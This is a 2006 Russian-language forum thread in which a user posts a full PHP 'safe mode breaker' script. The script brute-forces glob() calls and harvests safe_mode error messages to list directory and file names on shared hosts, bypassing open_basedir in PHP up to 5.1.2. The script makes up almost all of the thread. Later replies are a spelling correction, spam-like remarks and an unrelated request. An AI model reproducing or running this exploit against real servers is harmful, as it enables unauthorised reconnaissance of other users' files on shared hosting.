Скрипт для...

Противодействие кибертерроризму, информационная безопасность компьютерных систем.

Скрипт для...

Сообщение m4rrow » Пт фев 10, 2006 5:05 pm

..просмотра имен файлов/папок на хостингах с включенным safe_mode в обход open_basedir. Пробивает php вплоть до 5.1.2.
Код: Выделить всё
<?

  // Safe mode breaker. eXpl0id by KPbIC [myiworm@mail.ru]
  // data: 28.01.2006

  error_reporting(E_WARNING);
  ini_set("display_errors", 1);

  echo "<head><title>".getcwd()."</title></head>";

  echo "<form method=POST>";
  echo "<div style='float: left'>Root directory: <input type=text name=root value='{$_POST['root']}'></div>";
  echo "<input type=submit value='--&raquo;'></form>";

  echo "<HR>";

  // break fucking safe-mode !

  $root = "/";

  if($_POST['root']) $root = $_POST['root'];

  if (!ini_get('safe_mode')) die("Safe-mode is OFF.");

  $c = 0; $D = array();
  set_error_handler("eh");

  $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";

  for($i=0; $i < strlen($chars); $i++){
  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";

  $prevD = $D[count($D)-1];
  glob($path."*");

        if($D[count($D)-1] != $prevD){

        for($j=0; $j < strlen($chars); $j++){

           $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";

           $prevD2 = $D[count($D)-1];
           glob($path."*");

              if($D[count($D)-1] != $prevD2){


                 for($p=0; $p < strlen($chars); $p++){

                 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";

                 $prevD3 = $D[count($D)-1];
                 glob($path."*");

                    if($D[count($D)-1] != $prevD3){


                       for($r=0; $r < strlen($chars); $r++){

                       $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
                       glob($path."*");

                       }

                    }       

                 }

              }       
   
        }   

        }

  }

  $D = array_unique($D);

  echo "<xmp>";
  foreach($D as $item) echo "{$item}\n";
  echo "</xmp>";




  function eh($errno, $errstr, $errfile, $errline){

     global $D, $c, $i;
     preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
     if($o){ $D[$c] = $o[2]; $c++;}

  }

?>

--
Информация представлена в ознакомительных целях)
m4rrow
 
Сообщения: 7
Зарегистрирован: Пт фев 10, 2006 4:58 pm

Сообщение nfnick » Вс фев 12, 2006 11:04 am

респект конечно, но я думаю мало кому тут это понадобится :)
и в комментах
// data: 28.01.2006
не пиши такова Ж)
data = данные
дата = date
nfnick
участник
 
Сообщения: 33
Зарегистрирован: Пт фев 10, 2006 2:34 pm

Сообщение m4rrow » Вс фев 12, 2006 2:23 pm

оК)
m4rrow
 
Сообщения: 7
Зарегистрирован: Пт фев 10, 2006 4:58 pm

Re: Скрипт для...

Сообщение jax1 » Сб окт 10, 2015 2:06 pm

Странный скрипт
_____________________
с уважением http://cncgl.ru/logistika/
jax1
новенький
 
Сообщения: 15
Зарегистрирован: Сб июл 18, 2015 4:32 pm

Re: Скрипт для...

Сообщение mari27seksi » Пн ноя 09, 2015 12:04 pm

у каждого свои видно приколы )))

---------------
тут
mari27seksi
участник
 
Сообщения: 24
Зарегистрирован: Ср окт 14, 2015 10:48 am

Скрипт для

Сообщение eSovenok » Вс дек 27, 2015 2:13 pm

Нужен скрипт для блендера для импорта-экспорта .fef
.
eSovenok
 
Сообщения: 5
Зарегистрирован: Вт ноя 24, 2015 10:27 pm
Откуда: Беларусь


Вернуться в Компьютерный терроризм

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1

Рассылки Subscribe.Ru Лента "Новости Центра исследования компьютерной преступности"

cron